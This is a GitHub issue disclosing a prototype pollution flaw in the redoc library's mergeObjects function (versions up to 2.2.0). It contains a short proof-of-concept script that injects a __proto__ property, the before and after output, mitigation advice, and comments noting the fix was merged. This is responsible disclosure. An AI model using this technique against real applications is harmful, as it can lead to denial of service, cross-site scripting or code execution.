Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Prototype Pollution Vulnerability Affecting redoc <=2.2.0 #2499

Closed
tariqhawis opened this issue Mar 13, 2024 · 2 comments
Closed

Prototype Pollution Vulnerability Affecting redoc <=2.2.0 #2499

tariqhawis opened this issue Mar 13, 2024 · 2 comments
Labels
Type: Bug

Comments

@tariqhawis
Copy link

tariqhawis commented Mar 13, 2024
edited
Loading

Overview

The vulnerability located at Module.mergeObjects (redoc/bundles/redoc.lib.js:2). when mergeObjects() method
used to recursively copy source property to the destination. Since there's no security checks in-place, an attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.

PoC:

(async () => {
  const lib = await import('redoc');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.mergeObjects ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__ or constructor assigned. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
@tariqhawis tariqhawis changed the title Prototype Pollution Vulnerability Affecting redoc module, versions [2.0.0-rc.54,2.0.0-rc.75], [2.0.0,2.1.3] Prototype Pollution Vulnerability Affecting redoc <=2.2.0 Nov 19, 2024
KsAkira10 pushed a commit to KsAkira10/redoc that referenced this issue Jan 2, 2025
fix: Prototype Pollution Vulnerability Affecting redoc <=2.2.0
ca247fd 
Redocly#2499
@KsAkira10 KsAkira10 mentioned this issue Jan 2, 2025
Merged
3 tasks
AlexVarchuk pushed a commit that referenced this issue Jan 28, 2025
@KsAkira10
fix: Prototype Pollution Vulnerability Affecting redoc <=2.2.0 (#2638)
153ec7a 
#2499

Co-authored-by: Lucas Akira Uehara <[email protected]>
@AlexVarchuk
Copy link
Collaborator

fixed via #2638

@huazeez
Copy link

huazeez commented Jan 29, 2025

@AlexVarchuk @KsAkira10 will you be creating a new release version that includes this vulnerability fix? Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Type: Bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@tariqhawis @huazeez @AlexVarchuk